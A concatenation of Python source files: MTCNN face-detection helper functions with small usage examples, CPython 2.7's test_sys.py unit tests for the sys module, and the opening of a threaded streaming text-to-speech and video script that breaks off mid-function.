b_1 = boundingbox[:, 0] + reg[:, 0] * width
b_2 = boundingbox[:, 1] + reg[:, 1] * height
b_3 = boundingbox[:, 2] + reg[:, 2] * width
b_4 = boundingbox[:, 3] + reg[:, 3] * height
boundingbox[:, 0:4] = np.transpose(np.vstack([b_1, b_2, b_3, b_4]))
return boundingbox
def generate_bounding_box(imap, reg, scale, threshold):
"""Use heatmap to generate bounding boxes"""
# pylint: disable=too-many-locals
stride = 2
cellsize = 12
imap = np.transpose(imap)
d_x1 = np.transpose(reg[:, :, 0])
d_y1 = np.transpose(reg[:, :, 1])
d_x2 = np.transpose(reg[:, :, 2])
d_y2 = np.transpose(reg[:, :, 3])
dim_y, dim_x = np.where(imap >= threshold)
if dim_y.shape[0] == 1:
d_x1 = np.flipud(d_x1)
d_y1 = np.flipud(d_y1)
d_x2 = np.flipud(d_x2)
d_y2 = np.flipud(d_y2)
score = imap[(dim_y, dim_x)]
reg = np.transpose(np.vstack([d_x1[(dim_y, dim_x)], d_y1[(dim_y, dim_x)],
d_x2[(dim_y, dim_x)], d_y2[(dim_y, dim_x)]]))
if reg.size == 0:
reg = np.empty((0, 3))
bbox = np.transpose(np.vstack([dim_y, dim_x]))
q_1 = np.fix((stride * bbox + 1) / scale)
q_2 = np.fix((stride * bbox + cellsize - 1 + 1) / scale)
boundingbox = np.hstack([q_1, q_2, np.expand_dims(score, 1), reg])
return boundingbox, reg
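# [Editor's illustrative sketch, never called] generate_bounding_box maps each PNet
# heatmap cell back to image coordinates: a cell at (row, col) corresponds to a 12x12
# window placed with stride 2 in the scaled image, divided by the pyramid scale. A
# worked example with made-up indices and scale:
def _heatmap_to_box_example(row=5, col=7, scale=0.5, stride=2, cellsize=12):
    q_1 = np.fix((stride * np.array([row, col]) + 1) / scale)         # top-left corner
    q_2 = np.fix((stride * np.array([row, col]) + cellsize) / scale)  # bottom-right corner
    return q_1, q_2  # -> arrays [22., 30.] and [44., 52.] for these values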
# function pick = nms(boxes,threshold,type)
def nms(boxes, threshold, method):
""" Non_Max Suppression """
# pylint: disable=too-many-locals
if boxes.size == 0:
return np.empty((0, 3))
x_1 = boxes[:, 0]
y_1 = boxes[:, 1]
x_2 = boxes[:, 2]
y_2 = boxes[:, 3]
var_s = boxes[:, 4]
area = (x_2 - x_1 + 1) * (y_2 - y_1 + 1)
s_sort = np.argsort(var_s)
pick = np.zeros_like(var_s, dtype=np.int16)
counter = 0
while s_sort.size > 0:
i = s_sort[-1]
pick[counter] = i
counter += 1
idx = s_sort[0:-1]
xx_1 = np.maximum(x_1[i], x_1[idx])
yy_1 = np.maximum(y_1[i], y_1[idx])
xx_2 = np.minimum(x_2[i], x_2[idx])
yy_2 = np.minimum(y_2[i], y_2[idx])
width = np.maximum(0.0, xx_2-xx_1+1)
height = np.maximum(0.0, yy_2-yy_1+1)
inter = width * height
if method == 'Min':
var_o = inter / np.minimum(area[i], area[idx])
else:
var_o = inter / (area[i] + area[idx] - inter)
s_sort = s_sort[np.where(var_o <= threshold)]
pick = pick[0:counter]
return pick
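# [Editor's illustrative sketch, never called] Usage example for nms() above on two
# heavily overlapping boxes and one separate box: the lower-scoring overlapping box is
# suppressed. Coordinates and scores are invented for illustration.
def _nms_example():
    boxes = np.array([[10, 10, 50, 50, 0.9],        # kept (highest score)
                      [12, 12, 48, 48, 0.8],        # suppressed (IoU with first > 0.5)
                      [100, 100, 140, 140, 0.7]])   # kept (no overlap)
    return nms(boxes, 0.5, 'Union')  # -> array([0, 2]) (indices of the kept boxes)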
# function [d_y ed_y d_x ed_x y e_y x e_x tmp_width tmp_height] = pad(total_boxes,width,height)
def pad(total_boxes, width, height):
"""Compute the padding coordinates (pad the bounding boxes to square)"""
tmp_width = (total_boxes[:, 2] - total_boxes[:, 0] + 1).astype(np.int32)
tmp_height = (total_boxes[:, 3] - total_boxes[:, 1] + 1).astype(np.int32)
numbox = total_boxes.shape[0]
d_x = np.ones((numbox), dtype=np.int32)
d_y = np.ones((numbox), dtype=np.int32)
ed_x = tmp_width.copy().astype(np.int32)
ed_y = tmp_height.copy().astype(np.int32)
dim_x = total_boxes[:, 0].copy().astype(np.int32)
dim_y = total_boxes[:, 1].copy().astype(np.int32)
e_x = total_boxes[:, 2].copy().astype(np.int32)
e_y = total_boxes[:, 3].copy().astype(np.int32)
tmp = np.where(e_x > width)
ed_x.flat[tmp] = np.expand_dims(-e_x[tmp] + width + tmp_width[tmp], 1)
e_x[tmp] = width
tmp = np.where(e_y > height)
ed_y.flat[tmp] = np.expand_dims(-e_y[tmp] + height + tmp_height[tmp], 1)
e_y[tmp] = height
tmp = np.where(dim_x < 1)
d_x.flat[tmp] = np.expand_dims(2 - dim_x[tmp], 1)
dim_x[tmp] = 1
tmp = np.where(dim_y < 1)
d_y.flat[tmp] = np.expand_dims(2 - dim_y[tmp], 1)
dim_y[tmp] = 1
return d_y, ed_y, d_x, ed_x, dim_y, e_y, dim_x, e_x, tmp_width, tmp_height
# function [bbox_a] = rerec(bbox_a)
def rerec(bbox_a):
"""Convert bbox_a to square."""
height = bbox_a[:, 3]-bbox_a[:, 1]
width = bbox_a[:, 2]-bbox_a[:, 0]
length = np.maximum(width, height)
bbox_a[:, 0] = bbox_a[:, 0] + width * 0.5 - length * 0.5
bbox_a[:, 1] = bbox_a[:, 1] + height * 0.5 - length * 0.5
bbox_a[:, 2:4] = bbox_a[:, 0:2] + np.transpose(np.tile(length, (2, 1)))
return bbox_a
def imresample(img, size):
""" Resample image """
# pylint: disable=no-member
im_data = cv2.resize(img, (size[1], size[0]),
interpolation=cv2.INTER_AREA) # @UndefinedVariable
return im_data
|
test_sys.py
|
# -*- coding: iso-8859-1 -*-
import unittest, test.test_support
from test.script_helper import assert_python_ok, assert_python_failure
import cStringIO
import gc
import operator
import os
import struct
import sys
class SysModuleTest(unittest.TestCase):
def tearDown(self):
test.test_support.reap_children()
def test_original_displayhook(self):
import __builtin__
savestdout = sys.stdout
out = cStringIO.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(__builtin__, "_"):
del __builtin__._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(__builtin__, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(__builtin__._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
sys.stdout = savestdout
def test_lost_displayhook(self):
olddisplayhook = sys.displayhook
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
sys.displayhook = olddisplayhook
def test_custom_displayhook(self):
olddisplayhook = sys.displayhook
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
sys.displayhook = olddisplayhook
def test_original_excepthook(self):
savestderr = sys.stderr
err = cStringIO.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError, exc:
eh(*sys.exc_info())
sys.stderr = savestderr
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exc_clear(self):
self.assertRaises(TypeError, sys.exc_clear, 42)
# Verify that exc_info is present and matches exc, then clear it, and
# check that it worked.
def clear_check(exc):
typ, value, traceback = sys.exc_info()
self.assertTrue(typ is not None)
self.assertTrue(value is exc)
self.assertTrue(traceback is not None)
with test.test_support.check_py3k_warnings():
sys.exc_clear()
typ, value, traceback = sys.exc_info()
self.assertTrue(typ is None)
self.assertTrue(value is None)
self.assertTrue(traceback is None)
def clear():
try:
raise ValueError, 42
except ValueError, exc:
clear_check(exc)
# Raise an exception and check that it can be cleared
clear()
# Verify that a frame currently handling an exception is
# unaffected by calling exc_clear in a nested frame.
try:
raise ValueError, 13
except ValueError, exc:
typ1, value1, traceback1 = sys.exc_info()
clear()
typ2, value2, traceback2 = sys.exc_info()
self.assertTrue(typ1 is typ2)
self.assertTrue(value1 is exc)
self.assertTrue(value1 is value2)
self.assertTrue(traceback1 is traceback2)
# Check that an exception can be cleared outside of an except block
clear_check(exc)
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
# both unnormalized...
rc, out, err = assert_python_failure('-c', 'raise SystemExit, 46')
self.assertEqual(rc, 46)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# ... and normalized
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# test that the exit machinery handles long exit codes
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47L)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
rc, out, err = assert_python_ok('-c', 'raise SystemExit(0L)')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (repr(err), repr(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the unicode message is encoded to the stderr encoding
check_exit_message(
r'import sys; sys.exit(u"h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
if test.test_support.have_unicode:
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEqual(sys.getcheckinterval(), n)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
self.assertRaises(OverflowError, sys.setrecursionlimit, 1 << 31)
try:
sys.setrecursionlimit((1 << 31) - 5)
try:
# issue13546: isinstance(e, ValueError) used to fail
# when the recursion limit is close to 1<<31
raise ValueError()
except ValueError, e:
pass
finally:
sys.setrecursionlimit(oldlimit)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.test_support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.im_func.func_code \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
@test.test_support.reap_threads
def current_frames_with_threads(self):
import threading, thread
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(thread.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = thread.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assertIn(0, d)
self.assertTrue(d[0] is sys._getframe())
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, basestring)
self.assertIsInstance(sys.exec_prefix, basestring)
self.assertIsInstance(sys.executable, basestring)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.long_info), 2)
self.assertTrue(sys.long_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.long_info.sizeof_digit >= 1)
self.assertEqual(type(sys.long_info.bits_per_digit), int)
self.assertEqual(type(sys.long_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertIsInstance(sys.maxint, int)
if test.test_support.have_unicode:
self.assertIsInstance(sys.maxunicode, int)
self.assertIsInstance(sys.platform, basestring)
self.assertIsInstance(sys.prefix, basestring)
self.assertIsInstance(sys.version, basestring)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
def test_43581(self):
# Can't use sys.stdout, as this is a cStringIO object when
# the test runs under regrtest.
if not (os.environ.get('PYTHONIOENCODING') or
(sys.__stdout__.isatty() and sys.__stderr__.isatty())):
self.skipTest('stdout/stderr encoding is not set')
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug", "py3k_warning", "division_warning", "division_new",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_site", "ignore_environment", "tabcheck", "verbose",
"unicode", "bytes_warning", "hash_randomization")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assertTrue(repr(sys.flags))
@test.test_support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
import subprocess
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, unichr(0xa2).encode("cp424"))
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print unichr(0xa2)'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, '?')
def test_call_tracing(self):
self.assertEqual(sys.call_tracing(str, (2,)), "2")
self.assertRaises(TypeError, sys.call_tracing, str, 2)
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non existent program name and Python is unable to
# retrieve the real program name
import subprocess
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c", 'import sys; print repr(sys.executable)'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
executable = p.communicate()[0].strip()
p.wait()
self.assertIn(executable, ["''", repr(sys.executable)])
@test.test_support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.long_info.sizeof_digit
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
check_sizeof = test.test_support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
size = test.test_support.calcobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), size('l'))
# but lists are
self.assertEqual(sys.getsizeof([]), size('P PP') + gc_header_size)
def test_errors(self):
class BadSizeof(object):
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof(object):
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class OverflowSizeof(long):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.test_support.calcobjsize
self.assertEqual(sys.getsizeof(True, -1), size('l'))
def test_objecttypes(self):
# check all types defined in Objects/
calcsize = struct.calcsize
size = test.test_support.calcobjsize
vsize = test.test_support.calcvobjsize
check = self.check_sizeof
# bool
check(True, size('l'))
# buffer
with test.test_support.check_py3k_warnings():
check(buffer(''), size('2P2Pil'))
# builtin_function_or_method
check(len, size('3P'))
# bytearray
samples = ['', 'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('iPP') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('PP'))
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().func_closure[0], size('P'))
# classobj (old-style class)
class class_oldstyle():
def method():
pass
check(class_oldstyle, size('7P'))
# instance (old-style class)
check(class_oldstyle(), size('3P'))
# instancemethod (old-style class)
check(class_oldstyle().method, size('4P'))
# complex
check(complex(0,1), size('2d'))
# code
check(get_cell().func_code, size('4i8Pi3P'))
# BaseException
check(BaseException(), size('3P'))
# UnicodeEncodeError
check(UnicodeEncodeError("", u"", 0, 0, ""), size('5P2PP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", "", 0, 0, ""), size('5P2PP'))
# UnicodeTranslateError
check(UnicodeTranslateError(u"", 0, 1, ""), size('5P2PP'))
# method_descriptor (descriptor object)
check(str.lower, size('2PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('2PP'))
# getset_descriptor (descriptor object)
import __builtin__
check(__builtin__.file.closed, size('2PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('2P2P'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# dict
check({}, size('3P2P') + 8*calcsize('P2P'))
x = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(x, size('3P2P') + 8*calcsize('P2P') + 16*calcsize('P2P'))
# dictionary-keyview
check({}.viewkeys(), size('P'))
# dictionary-valueview
check({}.viewvalues(), size('P'))
# dictionary-itemview
check({}.viewitems(), size('P'))
# dictionary iterator
check(iter({}), size('P2PPP'))
# dictionary-keyiterator
check({}.iterkeys(), size('P2PPP'))
# dictionary-valueiterator
check({}.itervalues(), size('P2PPP'))
# dictionary-itemiterator
check({}.iteritems(), size('P2PPP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('l3P'))
# file
f = file(test.test_support.TESTFN, 'wb')
try:
check(f, size('4P2i4P3i3P3i'))
finally:
f.close()
test.test_support.unlink(test.test_support.TESTFN)
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, vsize('12P3i' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size('9P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('P'))
# classmethod
check(bar, size('P'))
# generator
def get_gen(): yield 1
check(get_gen(), size('Pi2P'))
# integer
check(1, size('l'))
check(100, size('l'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, vsize('PP') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('lP'))
# long
check(0L, vsize(''))
check(1L, vsize('') + self.longdigit)
check(-1L, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.long_info.bits_per_digit
check(long(PyLong_BASE), vsize('') + 2*self.longdigit)
check(long(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(long(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# module
check(unittest, size('P'))
# None
check(None, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('4Pi'))
# PyCObject
# PyCapsule
# XXX
# rangeiterator
check(iter(xrange(1)), size('4l'))
# reverse
check(reversed(''), size('PP'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3P2P' + PySet_MINSIZE*'lP' + 'lP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*calcsize('lP'))
check(frozenset(sample), s + newsize*calcsize('lP'))
# setiterator
check(iter(set()), size('P3P'))
# slice
check(slice(1), size('3P'))
# str
vh = test.test_support._vheader
check('', calcsize(vh + 'lic'))
check('abc', calcsize(vh + 'lic') + 3)
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# tupleiterator
check(iter(()), size('lP'))
# type
s = vsize('P2P15Pl4PP9PP11PI' # PyTypeObject
'39P' # PyNumberMethods
'3P' # PyMappingMethods
'10P' # PySequenceMethods
'6P' # PyBufferProcs
'2P')
class newstyleclass(object):
pass
check(newstyleclass, s)
# builtin type
check(int, s)
# NotImplementedType
import types
check(types.NotImplementedType, s)
# unicode
usize = len(u'\0'.encode('unicode-internal'))
samples = [u'', u'1'*100]
# we need to test for both sizes, because we don't know if the string
# has been cached
for s in samples:
check(s, size('PPlP') + usize * (len(s) + 1))
# weakref
import weakref
check(weakref.ref(int), size('2Pl2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pl2P'))
# xrange
check(xrange(1), size('3l'))
check(xrange(66000), size('3l'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.test_support.calcobjsize
vsize = test.test_support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size(''))
# imp.NullImporter
import imp
f = open(test.test_support.TESTFN, 'wb')
try:
check(imp.NullImporter(f.name), size(''))
finally:
f.close()
test.test_support.unlink(test.test_support.TESTFN)
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb != None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_main():
test_classes = (SysModuleTest, SizeofTest)
test.test_support.run_unittest(*test_classes)
if __name__ == "__main__":
test_main()
|
inference_webstreaming_socket_text_googleSTT_googleTTS.py
|
# merge of inference_webstreaming_socket_audio.py, tts_socket_server.py
# run this code, then once model is loaded run the stt_stream_socket_client.py code on remote machine
# finally run the ffplay command with the appropriate port forwarding etc. to see the results
# Alternatively, at the client just run run_streaming_text.sh with the stt_stream_socket_client.py
# and the json in same directory
'''
Architecture: Thread 1 (audio buffering), Thread 2 (video out), Thread 3 (audio out), Thread 4 (text input).
Thread 4: receives text packets from the socket connection (paragraphs separated by \n),
sends the text to the Google TTS API, receives the synthesized audio and
writes it to a queue read by thread 1
Thread 1: checks every 200ms whether there is enough synthesized audio in its input queue
to be played; if not, it pads the remainder of the step with silence, then
forwards fixed-size audio chunks to threads 2 & 3 (using queues)
Thread 2: receives audio chunks from thread 1, generates video frames and sends them to the
ffmpeg process (using a named pipe)
Thread 3: receives audio chunks from thread 1 and sends them to the ffmpeg process
(using a named pipe)
'''
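# The threads below communicate through the standard producer/consumer pattern:
# queue.Queue for data hand-off and threading.Event for start/stop signalling.
# A minimal, self-contained sketch of that pattern follows (illustrative only,
# never called by the pipeline; all names in it are made up for the example):
def _queue_event_handoff_sketch():
    import queue
    import threading
    q = queue.Queue()
    done = threading.Event()
    def producer():
        for i in range(3):
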